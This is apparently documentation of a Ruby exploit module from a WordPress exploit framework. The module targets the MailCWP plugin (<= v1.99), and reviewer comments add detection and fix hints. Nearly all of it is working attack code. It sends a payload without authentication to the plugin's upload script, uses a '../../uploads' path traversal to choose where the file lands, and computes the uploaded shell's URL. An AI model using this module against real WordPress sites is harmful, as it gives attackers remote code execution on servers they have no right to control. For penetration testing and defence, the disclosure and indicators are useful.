class Wpxf::Exploit::MailcwpUnauthenticatedShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 6
# Runs the superclass constructor, then registers this module's descriptive
# metadata through update_info.
#
# Defender summary taken from the metadata below: the issue is catalogued as
# WPVDB 8090, is described as an unauthenticated upload, and the module name
# gives MailCWP <= v1.99 as the affected range.
def initialize
  super

  credits = [
    'Larry W. Cashdollar', # Discovery and disclosure
    'rastating'            # WPXF module
  ]
  advisories = [
    ['WPVDB', '8090'],
    ['URL', 'http://www.vapid.dhs.org/advisory.php?v=138']
  ]

  update_info(
    name: 'MailCWP <= v1.99 Unauthenticated Shell Upload',
    author: credits,
    references: advisories,
    date: 'Jul 09 2015'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 23
# Delegates the version check to check_plugin_version_from_readme, passing the
# plugin slug and the version bound.
#
# NOTE(review): '1.100' is presumably the first fixed release (the module name
# lists <= v1.99 as affected); confirm against the helper's contract. The same
# bound is the upgrade target for anyone auditing installed plugin versions.
def check
  plugin_slug = 'mailcwp'
  version_bound = '1.100'
  check_plugin_version_from_readme(plugin_slug, version_bound)
end
message_id()
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 31
# Returns the message id used for this run, generating it on first use and
# reusing the cached value afterwards so the request parameters and the
# expected file name agree.
#
# NOTE(review): Utility::Text.rand_numeric(3) presumably yields a
# three-character numeric string; confirm against the helper.
def message_id
  return @message_id if @message_id

  @message_id = Utility::Text.rand_numeric(3)
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 42
# Builds and returns a Utility::BodyBuilder holding a single file part.
#
# The part is registered under the form field name 'file', with the encoded
# payload as its content and payload_name as its file name. For log review
# and WAF rules, the field name 'file' is the only fixed value in this body.
def payload_body_builder
  Utility::BodyBuilder.new.tap do |form|
    form.add_file_from_string('file', payload.encoded, payload_name)
  end
end
upload_request_params()
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 35
# Returns the parameters sent with the upload request: the per-run message id
# and a client-chosen upload directory.
#
# The upload_dir value is a relative path containing '../' segments, so the
# destination directory is controlled by the request rather than the server.
# A request to the uploader whose upload_dir contains '../' is a direct
# detection indicator. Server-side, the destination should be fixed or
# canonicalised and checked against an allowed base directory.
def upload_request_params
  params = {}
  params[:message_id] = message_id
  params[:upload_dir] = '../../uploads'
  params
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 48
# Returns the URL where the uploaded file is expected to be reachable: the
# WordPress uploads URL joined with "<message_id>-<payload_name>".
#
# For incident response, unexpected files directly under the uploads root
# whose names start with the message id and a hyphen fit this pattern.
# NOTE(review): the "<id>-<name>" naming is presumably applied by the plugin's
# uploader; confirm against the plugin source.
def uploaded_payload_location
  uploads_root = wordpress_url_uploads
  stored_name = "#{message_id}-#{payload_name}"
  normalize_uri(uploads_root, stored_name)
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb, line 27
# Returns the URL of the plugin's upload script, built from the WordPress
# plugins URL, the 'mailcwp' plugin directory and 'mailcwp-upload.php'.
#
# No login step appears in this class, which matches the "unauthenticated"
# label in the module name. Direct requests to this script path are worth
# alerting on or blocking at the web server until the plugin is updated.
def uploader_url
  path_segments = %w[mailcwp mailcwp-upload.php]
  normalize_uri(wordpress_url_plugins, *path_segments)
end